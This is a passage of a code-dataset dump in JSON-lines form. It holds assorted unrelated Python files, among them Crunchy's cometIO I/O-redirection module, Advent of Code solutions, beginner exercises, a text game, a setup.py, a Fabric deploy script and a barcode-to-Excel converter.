candidates.append(word)\r\n # else the edit distance is greater than the lower edit distance and we just want to move on\r\n else:\r\n continue\r\nprint (\"\")\r\nprint(candidates)\r\nprint (\"\")\r\n\r\n# now that we have a list of candidates, let's show what the difference is\r\n\r\nfor candidate in candidates:\r\n d=difflib.Differ()\r\n diff=d.compare(french,candidate)\r\n print (' '.join(diff))\r\n print (dictionary.meaning(candidate))\r\n print ('')\r\n #for line in difflib.context_diff(french, candidate):\r\n # sys.stdout.write(line) \r\n\r\n\r\n##example\r\n\r\n#def comparison(french,a_words[i]):\r\n #set_french= Counter(french)\r\n #set_a_words[i]=Counter(a_words[i])\r\n #common= set_french &set_a_words[i]\r\n \r\n\r\n#if len(a_words[i])>7:\r\n #comparison(french,a_words[i])\r\n #if common>=4:\r\n #print (a_words[i])\r\n\r\n\r\n #while french[1,2,3,4]== a_words[i][1,2,3,4]\r\n\r\n#if a_words.contains(french[1])and a_words.contains(french[2]) and a_words.contains(french[3]):\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#as inputfile\r\n#compare=open(filename,'r')\r\n\r\n\r\n\r\n\r\n #fp.seek (key[0]==individualletters:\r\n #write key \r\n\r\n\r\n\r\n #get key in dictionary with \r\n #searchphrase=\r\n\r\n\r\n\r\n #searchfile= open(dictionary)\r\n #for line in searchfile:\r\n #line= line.write\r\n \r\n \r\n \r\n \r\n","sub_path":"language2translate.py","file_name":"language2translate.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"356927671","text":"# -*- coding: utf-8 -*-\n\"\"\"\nHandles all the Output - ie. is used to push javascript code\nto the page asynchronously.\nAlso handles the redirection of stdin, stdout and stderr.\n\"\"\"\n\nimport threading\nimport sys\nimport re\n\nimport src.interpreter as interpreter\nimport src.utilities as utilities\nimport src.interface as interface\n\nfrom src.interface import config, accounts, names, python_version\n\n# When print statements occur in cometIO.py, they are swallowed by the\n# http server. As a result, we introduce debug_msg as a utility function\n# which plays the role of \"print\" when debugging this module\ndebug_ids = []#[1, 2, 3, 4, 5, 6, 7, 8, 9]\n\ndef debug_msg(data, id_=None):\n \"\"\"write a debug message, debug messages always appear on stderr\"\"\"\n if id_ in debug_ids or id_ is None:\n sys.stderr.default_write(data + \"\\n\")\n\nshow_io_js = \"\"\"\n$(\"#out_%s\").html(\"\");\n$(\"#in_%s\").show();\ntry{\n $(\"#kill_%s\").show();\n }\ncatch(err){;} /* may not exist if ctypes not present. */\n\n\"\"\"\nhide_io_js = \"\"\"\n$(\"#in_%s\").hide();\ntry{\n $(\"#kill_%s\").hide();\n $(\"#kill_image_%s\").hide();\n }\ncatch(err){;} /* may not exist if ctypes not present. */\n\"\"\"\n# this should probably be animated:\nshow_help_js = \"\"\"\n$(\"#help_menu,#help_menu_x\").show();\n\"\"\"\n\nclass StringBuffer(object):\n \"\"\"A thread safe buffer used to queue up strings that can be appended\n together, I've left this in a separate class because it might one day be\n useful someplace else\"\"\"\n def __init__(self):\n self.lock = threading.RLock()\n self.event = threading.Event()\n self.data = \"\"\n def get(self):\n \"\"\"get the current contents of the buffer, if the buffer is empty, this\n always blocks until data is available.\n Multiple clients are handled in no particular order\"\"\"\n debug_msg(\"entering StringBuffer.get\", 1)\n while True:\n debug_msg(\"begin loop\", 5)\n self.event.clear()\n debug_msg(\"cleared events\", 5)\n self.lock.acquire()\n debug_msg(\"acquired lock\", 5)\n if len(self.data) > 0:\n t = self.data\n self.data = \"\"\n self.lock.release()\n debug_msg(\"leaving StringBuffer.get: \" + t, 1)\n return t\n self.lock.release()\n debug_msg(\"released lock\", 5)\n self.event.wait()\n\n def getline(self, uid):\n \"\"\"basically does the job of readline\"\"\"\n debug_msg(\"entering StringBuffer.getline\", 2)\n while True:\n self.event.clear()\n self.lock.acquire()\n data_t = self.data.split(\"\\n\", 1)\n if len(data_t) > 1:\n # we have a complete line, do something with it\n self.data = data_t[1]\n self.lock.release()\n debug_msg(\"leaving StringBuffer.getline: \" + data_t[0] +\n \"end_of_data\", 2)\n return uid, data_t[0] + \"\\n\"\n # no luck:\n self.lock.release()\n self.event.wait()\n\n def put(self, data):\n \"\"\"put some data into the buffer\"\"\"\n debug_msg(\"entering StringBuffer.put: \" + data, 3)\n self.lock.acquire()\n self.data += data\n self.event.set()\n self.lock.release()\n debug_msg(\"Leaving StringBuffer.put:\", 3)\n\nclass CrunchyIOBuffer(StringBuffer):\n \"\"\"A version optimised for crunchy IO\"\"\"\n help_flag = False\n\n def put_output(self, data, uid):\n \"\"\"put some output into the pipe\"\"\"\n\n #apply before_output hook first\n data = interface.plugin['services'].apply_io_hook('ANY', 'before_output', data)\n data = interface.plugin['services'].apply_io_hook(uid, 'before_output', data)\n if data == \"\":\n return\n data = data.replace('\"', '"')\n pdata = data.replace(\"\\\\\", \"\\\\\\\\\")\n pdata = data.replace(\"\\n\", \"\\\\n\")\n pdata = pdata.replace(\"\\r\", \"\\\\r\")\n debug_msg(\"pdata = \"+ pdata, 4)\n if python_version < 3:\n try:\n pdata = pdata.decode('utf-8')\n except:\n debug_msg(' Crunchy Error in trying to decode inside cometIO.py')\n debug_msg(' The likely cause is trying to print a unicode string prefixed by u')\n debug_msg(' as in u\"...\". If not, please file a bug report.')\n self.lock.acquire()\n pageid = uid.split(\"_\")[0]\n username = names[pageid]\n debug_msg(\"username = %s in CrunchyIOBuffer.put_output\"%username, 5)\n if self.data.endswith('\";//output\\n'):\n self.data = self.data[:-11] + '%s\";//output\\n' % (pdata)\n # Saving session; appending from below\n if uid in config[username]['logging_uids']:\n log_id = config[username]['logging_uids'][uid][0]\n config[username]['log'][log_id].append(data)\n utilities.log_session(username)\n self.event.set()\n elif self.help_flag == True:\n self.put(show_help_js)\n pdata = pdata.replace(\"class='%s'\"%interface.generic_output, \"class='help_menu'\")\n # use jQuery:\n self.put(\"\"\"$(\"#help_menu\").html(\"%s\");\\n\"\"\" % (pdata))\n self.help_flag = False\n else:\n #use jQuery:\n self.put(\"\"\"$(\"#out_%s\").append(\"%s\");//output\\n\"\"\" % (uid, pdata))\n # Saving session; first line...\n if uid in config[username]['logging_uids']:\n log_id = config[username]['logging_uids'][uid][0]\n config[username]['log'][log_id].append(data)\n utilities.log_session(username)\n self.lock.release()\n\n# there is one CrunchyIOBuffer for output per page:\noutput_buffers = {}\n# and one StringBuffer per input widget:\ninput_buffers = {}\n# and also one thread per input widget:\nthreads = {}\n\ndef kill_thread(uid):\n \"\"\"Kill a thread, given an associated uid\"\"\"\n threads[uid].terminate()\n\ndef comet(request):\n \"\"\"An http path handler, called from the page - blocks until there is data\n to be sent.\n This needs to be registered as a handler when Crunchy is launched.\"\"\"\n debug_msg(\"Entering comet() in cometIO.py\", 9)\n pageid = request.args[\"pageid\"]\n debug_msg(\" ... request.args = %s\" % request.args, 9)\n #wait for some data\n debug_msg(\" ... wait for data\", 9)\n data = output_buffers[pageid].get()\n debug_msg(\" ... found data\", 9)\n # OK, data found\n request.send_response(200)\n request.end_headers()\n\n # Whereas for Python 2 data is passed in encoded strings, with\n # Python 3, request data (from std{in, out, err}) is passed along in\n # Unicode strings; these need to\n # be encoded to be properly understood by the browser\n #if python_version >= 3:\n data = data.encode('utf-8')\n\n request.wfile.write(data)\n request.wfile.flush()\n debug_msg(\" ... done in comet()\", 9)\n\ndef register_new_page(pageid):\n \"\"\"Sets up the output queue for a new page\"\"\"\n output_buffers[pageid] = CrunchyIOBuffer()\ninterface.from_comet['register_new_page'] = register_new_page\n\ndef write_js(pageid, jscode):\n \"\"\"write some javascript to a page\"\"\"\n output_buffers[pageid].put(jscode)\n\ndef write_output(pageid, uid, output):\n '''write some simple output to an element identified by its uid'''\n try:\n output_buffers[pageid].put_output(output, uid)\n except:\n debug_msg(\"Problem in write_output\", 6)\n\ndef do_exec(code, uid, doctest=False):\n \"\"\"exec code in a new thread (and isolated environment).\n \"\"\"\n debug_msg(\"Entering cometIO.do_exec()\", 9)\n # When a security mode is set to \"display ...\", we only parse the\n # page, but no Python execution from is allowed from that page.\n try:\n pageid = uid.split(\"_\")[0]\n username = names[pageid]\n except:\n debug_msg(\"error in do_exec; uid =%s\"%uid, 8)\n return\n\n if 'display' in config[username]['_get_current_page_security_level']():\n return\n elif not accounts: # same if no username/password set\n return\n\n # make the io widget appear\n output_buffers[pageid].put(show_io_js % (uid, uid, uid))\n debug_msg(\" creating an intrepreter instance in cometIO.do_exec()\", 9)\n t = interpreter.Interpreter(code, uid, symbols=config[username]['symbols'],\n doctest=doctest)\n debug_msg(\" setting a daemon thread in cometIO.do_exec()\", 5)\n t.setDaemon(True)\n debug_msg(\" starting the thread in cometIO.do_exec()\", 5)\n t.start()\n debug_msg(\"reached the end of cometIO.do_exec()\", 5)\n\ndef push_input(request):\n \"\"\"An http request handler to deal with stdin\"\"\"\n uid = request.args[\"uid\"]\n pageid = uid.split(\"_\")[0]\n # echo back to output:\n if python_version >= 3:\n request.data = request.data.decode('utf-8')\n in_to_browser = utilities.changeHTMLspecialCharacters(request.data)\n in_to_browser = in_to_browser.replace('\\\\', r'\\\\')\n output_buffers[pageid].put_output(\"\"%interface.generic_output +\n in_to_browser + \"\", uid)\n # display help menu on a seperate div\n if request.data.startswith(\"help(\"):\n output_buffers[pageid].help_flag = True\n\n # ipython style help\n if request.data.rstrip().endswith(\"?\"):\n output_buffers[pageid].help_flag = True\n help_str = \"help(\" + request.data.rstrip()[:-1] + \")\\n\"\n input_buffers[uid].put(help_str)\n else:\n input_buffers[uid].put(request.data)\n\n request.send_response(200)\n request.end_headers()\n\ndef raw_push_input(uid, data):\n input_buffers[uid].put(data)\n\ndef is_accept_input(uid):\n return uid in input_buffers\n\nclass ThreadedBuffer(object):\n \"\"\"Split some IO acording to calling thread\"\"\"\n def __init__(self, out_buf=None, in_buf=None, buf_class=\"STDOUT\"):\n \"\"\"Initialise the object,\n out_buf is the default output stream, in_buf is input\n buf_class is a class to apply to the output - redirected output can be\n put in an html element with class=buf_class.\n Interestingly, having two threads with the same uids shouldn't break anything :)\n \"\"\"\n self.default_out = out_buf\n self.default_in = in_buf\n self.buf_class = buf_class\n# Unfortunately, IPython interferes with Crunchy.\n# The following is kept un-commented (unlike the rest of the IPython stuff\n# which has been commented out) so that users can try the relevant\n# code to start IPython from an interpreter or an editor and see\n# what happens.\n # the encoding is required by IPython but currently ignored by Crunchy.\n self.encoding = 'utf-8'\n # the following is defined as a dummy function to make IPython work;\n # it is currently ignored by Crunchy.\n def flush(self):\n '''\n dummy function required by IPython; otherwised ignored by Crunchy.\n\n Currently unused.\n '''\n return\n#==== end of IPython stuff\n\n def register_thread(self, uid):\n \"\"\"register a thread for redirected IO, registers the current thread\"\"\"\n mythread = threading.currentThread()\n mythread.setName(uid)\n input_buffers[uid] = StringBuffer()\n threads[uid] = threading.currentThread()\n debug_msg(\"registering thread for uid=%s\" % uid, 8)\n\n def unregister_thread(self):\n \"\"\"\n Uregister the current thread.\n This will cancel all pending input\n Assumes that no more input will be written specifically for this thread.\n In future IO for this thread will go via the defaults.\n \"\"\"\n uid = threading.currentThread().getName()\n if not self.__redirect(uid):\n return\n pageid = uid.split(\"_\")[0]\n del input_buffers[uid]\n # hide the input box and the Stop thread link\n output_buffers[pageid].put(hide_io_js % (uid, uid, uid))\n\n\n def write(self, data):\n \"\"\"write some data\"\"\"\n\n # First, check to see whether this is intended for comet at\n # all. This lets us use pdb, among other things, without\n # characters being escaped for HTML.\n uid = threading.currentThread().getName()\n if not self.__redirect(uid):\n try:\n return self.default_out.write(data)\n except:\n return self.default_out.write(data.encode('utf-8'))\n\n # Note: even though we create interpreters in separate threads\n # identified by their uid, Borg interpreters share a common\n # state. As a result, if we have long running code in one\n # Borg interpreter, there can be exchange of input or output between\n # the code running in that interpreter and code entered in another one.\n pageid = uid.split(\"_\")[0]\n data = utilities.changeHTMLspecialCharacters(data)\n\n debug_msg(\"write --- data , \" + data.replace('\\\\', r'\\\\'), 4)\n #Note: in the following, it is important to ensure that the\n # py_prompt class is surrounded by single quotes - not double ones.\n # normal prompt\n\n for _prompt in ['>>> ', # normal prompt\n '... ', # normal continuation prompt\n '--> ', # isolated prompt\n '<t>>> ', # type info prompt\n '_u__) ', # parrot\n '_u__)) ' # Parrots\n ]:\n dd = data.split('crunchy_py_prompt%s' % _prompt)\n data = (\"%s\" % (interface.generic_prompt, _prompt)).join(dd)\n\n data = data.replace('\\\\', r'\\\\')\n data = \"%s\" % (self.buf_class, data)\n output_buffers[pageid].put_output(data, uid)\n\n def read(self):\n \"\"\"N.B. this function is rarely, if ever, used - and is probably untested\"\"\"\n uid = threading.currentThread().getName()\n if self.__redirect(uid):\n #read the data\n data = input_buffers[uid].get()\n else:\n data = self.default_in.read()\n return data\n\n def readline(self):\n \"\"\"used by Interactive Console - raw_input(\">>>\")\"\"\"\n\n uid = threading.currentThread().getName()\n new_id = \"none\"\n debug_msg(\"entering readline, uid=%s\" % uid, 7)\n if self.__redirect(uid):\n new_id, data = input_buffers[uid].getline(uid)\n else:\n data = self.default_in.readline()\n debug_msg(\"leaving readline, uid=%s, new_id=%s\\ndata=%s\" % (uid,\n new_id, data), 7)\n return data\n\n def __redirect(self, uid):\n \"\"\"decide if the thread with uid uid should be redirected\"\"\"\n t = uid in input_buffers\n return t\n\n def default_write(self, data):\n \"\"\"write to the default output\"\"\"\n # Normalize to Unicode because Python 3's doctest will not\n # take bytes for its _SpoofOut = self.default_out.\n if python_version < 3:\n data = data.decode('utf-8')\n self.default_out.write(data)\n\nsys.stdin = ThreadedBuffer(in_buf=sys.stdin)\ndef init_stdios():\n # Note: we use Pygments classes\n sys.stdout = ThreadedBuffer(out_buf=sys.stdout, buf_class=interface.generic_output)\n sys.stderr = ThreadedBuffer(out_buf=sys.stderr, buf_class=interface.generic_traceback)\ninit_stdios()\ninterface.init_stdios = init_stdios\n","sub_path":"crunchy/src/cometIO.py","file_name":"cometIO.py","file_ext":"py","file_size_in_byte":15473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"130160018","text":"#1\nwith open('day2-data.txt') as f:\n line = f.readline()\n data = [int(x.strip()) for x in line.split(',')]\n data[1] = 12\n data[2] = 2\n for ix, num in enumerate(data):\n if ix % 4 == 0:\n if num == 1:\n data[data[ix+3]] = data[data[ix+1]] + data[data[ix+2]]\n elif num == 2:\n data[data[ix+3]] = data[data[ix+1]] * data[data[ix+2]]\n elif num == 99:\n break\n \n print(data[0])\n\nf.close()\n\n#2\nimport copy\nwith open('day2-data.txt') as f:\n line = f.readline()\n data = [int(x.strip()) for x in line.split(',')]\n expected_output = 19690720\n for noun in range(100):\n for verb in range(100):\n d = copy.deepcopy(data)\n d[1] = noun\n d[2] = verb\n for ix, num in enumerate(d):\n if ix % 4 == 0:\n if num == 1:\n d[d[ix+3]] = d[d[ix+1]] + d[d[ix+2]]\n elif num == 2:\n d[d[ix+3]] = d[d[ix+1]] * d[d[ix+2]]\n elif num == 99:\n break\n if d[0] == expected_output:\n print(100 * noun + verb)\n\nf.close()","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250188246","text":"import gym\nimport matplotlib.pyplot as plt\n\nmode = 'human'\n#mode = 'rgb_array'\n\nenv = gym.make(\"UR5Catch-v1\")\n#env = gym.make('FetchSlide-v1')\n\nenv.render('human')\n#env = gym.wrappers.Monitor(env, './video', force=True)\n#plt.imshow(env.render(mode='rgb_array', camera_id=-1))\n#plt.show()\nfor i in range(20):\n env.reset()\n env.render('human')\n for i in range(200):\n action = env.action_space.sample()\n print(\"action_space:\", env.action_space)\n print(\"action space sample:\", action)\n obs, reward, done, info = env.step(action)\n print(\"observation:\", obs)\n print(\"reward:\", reward)\n print(\"done:\", done)\n print(\"info:\", info)\n env.render('human')\n\n","sub_path":"ur5-test.py","file_name":"ur5-test.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"611511172","text":"import sys\n\nfrom setuptools import find_packages, setup\n\nwith open('runcommands/__init__.py') as fp:\n for line in fp:\n if line.startswith('__version__'):\n __version__ = line.split('=')[1].strip()[1:-1]\n\nwith open('README.rst') as fp:\n long_description = fp.read().strip()\n\ninstall_requires = []\n\nif sys.version_info[:2] < (3, 4):\n install_requires.append('enum34')\n\nsetup(\n name='runcommands',\n version=__version__,\n license='MIT',\n author='Wyatt Baldwin',\n author_email='self@wyattbaldwin.com',\n description='A simple command runner',\n long_description=long_description,\n url='https://bitbucket.org/wyatt/runcommands',\n packages=find_packages(),\n package_data={\n 'runcommands.completion': ['*/*'],\n 'runcommands.tests': ['*.cfg'],\n },\n install_requires=install_requires,\n extras_require={\n 'dev': [\n 'coverage',\n 'flake8',\n 'Sphinx',\n ],\n 'paramiko': [\n 'paramiko>=2.1.2',\n ],\n 'tox': [\n 'flake8',\n 'tox',\n ],\n },\n entry_points={\n 'console_scripts': [\n 'run = runcommands.__main__:main',\n 'runcmd = runcommands.__main__:main',\n 'runcommand = runcommands.__main__:main',\n 'runcommands = runcommands.__main__:main',\n 'runcommands-complete = runcommands.completion:complete.console_script',\n ],\n },\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Software Development :: Build Tools',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291417784","text":"# Number Pattern 2\n\n'''\nPrint the following pattern for the given N number of rows.\n\nPattern for N = 4\n1\n11\n202\n3003\n\n\nInput format :\nInteger N (Total no. of rows)\n\nOutput format :\nPattern in N lines\n\n\nSample Input :\n5\n\nSample Output :\n1\n11\n202\n3003\n40004\n'''\n\n# CODE #\n\n'''\nn = int(input())\ni = 1\n\nif n > 0:\n while i <= n:\n j = 1\n p = i\n while j <= i:\n\n if i == p and j == 1:\n if i == 1 and j ==1:\n print(1, end='')\n else:\n print(i - 1, end='')\n elif j == i:\n print(i - 1, end='')\n else:\n print(0, end='')\n j += 1\n print()\n i += 1\nelse:\n print(1)\n'''\n\n### OR ###\n\n\nn = int(input())\nprint(1)\ni = 1\nwhile i < n:\n j = 0\n while j < i+1:\n if j==0 or j==i:\n print(i,end='')\n else:\n print(0,end=\"\")\n j = j + 1\n print()\n i = i + 1\n","sub_path":"Patterns/Number Pattern 2.py","file_name":"Number Pattern 2.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"438624586","text":"\"\"\"Given a number output the Fibinacci Sequence\"\"\"\n\n\nglobal user_input\n\ncounter = 0\ndef fibinacci(num1, num2, counter):\n counter += 1\n if (num1 > num2):\n return 1\n\n if counter > int(user_input):\n return (\"Finished\")\n\n print(num1)\n\n return fibinacci(num2, num1+num2, counter)\n\ntry:\n user_input = input(\"Please enter a number from 1-100: \")\nexcept TypeError:\n print(\"This is a type error make sure you type an interger\")\n\n\n\nnum1 = 0\nnum2 = 1\n\nfibinacci(num1, num2, counter)\n","sub_path":"Practice_Problems/Fibinacci_Seq.py","file_name":"Fibinacci_Seq.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"257001535","text":"import sys, random\r\n\r\n\r\nclass Person():\r\n\r\n def __init__(self, name, health = 100, friendly = 0.5, location = \"Cafeteria\", sex = \"M\"):\r\n self.name = name\r\n self.health = health\r\n self.friendly = friendly\r\n self.location = location\r\n self.sex = sex\r\n\r\n\r\ndef main():\r\n names = [\"John\", \"Missy\", \"irrelevant\", \"George\", \"Georg\", \"Jourge\", \"Jeorge\"]\r\n doing = \"\"\r\n lastInteractChr = None\r\n\r\n chrList = [Person(\"John\", 100, 0.8, \"Hallway\", \"M\"),\r\n Person(\"Missy\", 90, 0.4, \"Classroom1\", \"F\"),\r\n Person(\"George\", 100, 0.5, \"Cafeteria\", \"M\")]\r\n\r\n nameIndex = random.randrange(0, len(chrList) - 1)\r\n\r\n\r\n print(\"You have just entered your school\")\r\n\r\n while True:\r\n # Reactions\r\n print(\"\\n\")\r\n\r\n if doing == \"fight\":\r\n if action == \"punch\":\r\n if lastInteractChr.sex == \"M\":\r\n print(\"You suddenly realize that he is straight up dead.\")\r\n lastInteractChr.health = 0\r\n doing = None\r\n\r\n action = input(\"What do you want to do?\\n\")\r\n\r\n if doing == \"fight\":\r\n if action == \"punch\":\r\n if lastInteractChr.sex == \"F\":\r\n print(\"Your viscerally beat the poor girl in the face.\\n\" +\r\n \"Those around you stare in disgust. You can feel their anger in your chest.\")\r\n else:\r\n print(\"lol\\n\" +\r\n \"His face satisfyingly wobbles. You feel like a monster. You smile.\")\r\n elif action == \"stop\":\r\n print(\"You tear off your white wifebeater, tear a structural 2x4 out of the wall next to you,\\n\" +\r\n \"and use the two to construct a white flag. They appear to accept.\")\r\n doing = None\r\n elif action == \"?\":\r\n print(\"You may: \\n fight \\n run \\n go to class\")\r\n elif action == \"fight\":\r\n print(\"You turn to the nearest individual and raise your hand. Their name is {}.\".format(chrList[nameIndex].name))\r\n lastInteractChr = chrList[nameIndex]\r\n elif action == \"run\":\r\n print(\"Your break into a sprint. The wind is in your face, upsetting your glorious mullet.\")\r\n else:\r\n print(\"You stand stoically still, as if a statue chiseled from an eternal hill.\")\r\n\r\n if action == \"fight\":\r\n doing = \"fight\"\r\n\r\n\r\nmain()\r\n","sub_path":"messin.py","file_name":"messin.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"78340689","text":"N = [int(x) for x in input().split()]\ndays = 0\nfor i in range(1,N[0]):\n if i==1 or i==3 or i==5 or i==7 or i==8 or i==10 or i==12:\n days += 31\n elif i==2:\n days += 28\n else:\n days += 30\n\ndays += N[1]\ndays %= 7\n\nif days==0:\n print('SUN')\nif days==1:\n print('MON')\nif days==2:\n print('TUE')\nif days==3:\n print('WED')\nif days==4:\n print('THU')\nif days==5:\n print('FRI')\nif days==6:\n print('SAT')\n","sub_path":"Backjoon/HTJ/for문 사용해보기/1924 2007년.py","file_name":"1924 2007년.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"216845631","text":"# Working with Lists in Python\r\n\r\nmyUniqueList=[]\r\nmyLeftovers=[]\r\n\r\ndef search(x,index): # Function to check duplicacy\r\n \r\n for i in range(index):\r\n\r\n if x==myUniqueList[i]:\r\n return True # If duplicacy found it returns True\r\n\r\n\r\ndef AddToList(x,index):\r\n \r\n a=search(x,index)\t\r\n\r\n if a==True:\r\n myLeftovers.append(x) # Duplicate elements added to myLeftovers\r\n return False\r\n\r\n else:\r\n myUniqueList.append(x) # Unique elements added to myUniqueList\r\n return True\r\n\r\n\r\nAddToList(1,0) \r\nAddToList(2,1)\r\nAddToList(3,2)\r\nAddToList(5,3)\r\nAddToList(1,4)\r\nAddToList(2,5)\r\nAddToList(3,6)\r\n\r\nprint(myUniqueList)\r\nprint(myLeftovers)\r\n\r\n\r\n\r\n\r\n","sub_path":"py_assign4.py","file_name":"py_assign4.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"178292174","text":"f = open('请英文格式下导入条码.txt')\nlines = len(f.readlines())\nf.seek(0)\n\nDATE = []\nSPMC = []\nCPGG = []\nGG2 = []\nCS = []\nTM = []\n\nl1 = f.readlines()\n\na = 0\nb = len(l1)\nwhile a < b:\n l = l1[a].split('/')\n\n day = l[0][2:]\n ph = l[1]\n kj = l[2]\n dj = l[3]\n\n DATE.append(day)\n\n if dj == 'A':\n spmc = '一等品' + kj + '口径'\n elif dj == 'B':\n spmc = '二等品' + kj + '口径'\n else:\n spmc = '三等品' + kj + '口径'\n SPMC.append(spmc)\n\n m = len(l)\n if m == 6:\n dh = l[5][:12]\n gg2 = l[4]\n tm = day + '/' + ph + '/' + kj + '/' + dj + '/' + gg2 + '/' + dh\n GG2.append(gg2)\n TM.append(tm)\n CS.append(dh)\n \n if dj == 'A' and dh == '0772-6511119':\n dj1 = 'A'\n elif dj == 'A' and dh == '0772-6511099':\n dj1 = 'A1'\n elif dj == 'A' and dh == '0772-6511077':\n dj1 = 'A2'\n else:\n dj1 = dj\n cpgg = ph + dj1 \n CPGG.append(cpgg)\n elif m == 5:\n dh = '0'\n gg2 = l[4][:4]\n GG2.append(gg2)\n CS.append(dh)\n tm = day + '/' + ph + '/' + kj + '/' + dj + '/' + gg2\n TM.append(tm)\n cpgg = ph + dj\n CPGG.append(cpgg)\n \n a += 1\n \nfrom openpyxl import Workbook\nwb = Workbook()\nws = wb.active\nws1 = wb.create_sheet(\"Sheet1\", 0)\n\nws1['A1'] = '商品编号'\nws1['B1'] = '商品名称'\nws1['C1'] = '单位'\nws1['D1'] = '产品规格'\nws1['E1'] = '规格2'\nws1['F1'] = '保质期'\nws1['G1'] = '商品条码'\nws1['H1'] = '最低库存'\nws1['I1'] = '预设进价'\nws1['J1'] = '预设售价'\nws1['K1'] = '一级价格'\nws1['L1'] = '二级价格'\nws1['M1'] = '三级价格'\nws1['N1'] = '四级价格'\nws1['O1'] = '五级价格'\nws1['P1'] = '生产厂商'\nws1['Q1'] = '备注'\n\nv = 0\n\nwhile v < lines:\n\th = v + 2\n\tws1.cell(row = h , column = 2).value = SPMC[v]\n\tws1.cell(row = h , column = 3).value = '件'\n\tws1.cell(row = h , column = 4).value = CPGG[v]\n\tws1.cell(row = h , column = 5).value = GG2[v]\n\tws1.cell(row = h , column = 6).value = 720\n\tws1.cell(row = h , column = 7).value = TM[v]\n\tws1.cell(row = h , column = 16).value = CS[v]\n\tws1.cell(row = h , column = 17).value = DATE[v]\n\t\n\tv += 1\n\nf.close()\nwb.save('商品信息.xlsx') ","sub_path":"条码分析软件1.2.py","file_name":"条码分析软件1.2.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"34101707","text":"class Solution:\n def combinationSum2(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n ans = []\n candidates.sort()\n if len(candidates) == 0 or candidates[0] > target:\n return ans\n\n i = 0\n can_len = len(candidates)\n while i < can_len:\n if candidates[i] == target:\n ans.append([candidates[i]])\n break\n elif candidates[i] > target:\n break\n i += 1\n\n if i == 0:\n return ans\n\n for j in range(i):\n b = candidates[j + 1:i]\n if j > 0 and candidates[j] == candidates[j - 1]:\n continue\n l = self.combinationSum2(b, target - candidates[j])\n for each_ans in l:\n each_ans.append(candidates[j])\n ans.append(each_ans)\n return ans","sub_path":"40. Combination Sum II/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370935848","text":"# -*- coding: utf-8 -*-\n\nfrom fabric.api import run, cd, env, local\n\nenv.hosts = ['python@androidgreetings.ru']\nproject_path = '/home/python/androidgreetings'\n\n\ndef push_deploy():\n local('git push')\n deploy()\n\n\ndef deploy():\t\n\twith cd(project_path):\n\t\trun('git pull')\n\t\trun('sudo supervisorctl restart androidgreetings')\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568575101","text":"def isbn10to13(isbn10) :\n \"\"\"Converts an isbn10 numeric code to an isbn13 numeric code.\n Takes a string as the initial parameter and returns a string\"\"\"\n sums = 0\n for i in range(0, 9, 2) :\n sums = sums + 3 * int(isbn10[i])\n for i in range(1, 9, 2) :\n sums = sums + int(isbn10[i])\n print(sums)\n sums = sums + 9 * 1 + 7 * 3 + 8 * 1\n print(\"978\" + isbn10[:9] + str(sums % 10))\n return (\"978\" + isbn10[:9] + str((10 - sums) % 10))\n","sub_path":"2nd Year/SC272/stest2/isbn.py","file_name":"isbn.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"178973713","text":"from config import *\nfrom math import sqrt\n\nimport math\n\n\nclass Player:\n def __init__(self, game):\n self.pos = [150, 400]\n self.xDirection = 0 # tendency\n self.yDirection = 0\n self.facing_right = True\n self.game = game\n self.h = 191\n self.w = 100\n\n self.walk_cycle = Cycle(11, 0)\n\n\n def draw(self):\n pos = (self.pos[0] - (ENV[\"mouse_x\"] - SCREEN_WIDTH / 2) * (100 / self.pos[1]) ** 2,\n self.pos[1] - self.h - (ENV[\"mouse_y\"] - SCREEN_HEIGHT / 2) * (100 / self.pos[1]) ** 2)\n pygame.draw.ellipse(screen, (150, 150, 150), (pos[0], pos[1] + self.h - 20, self.w, 20))\n texture = 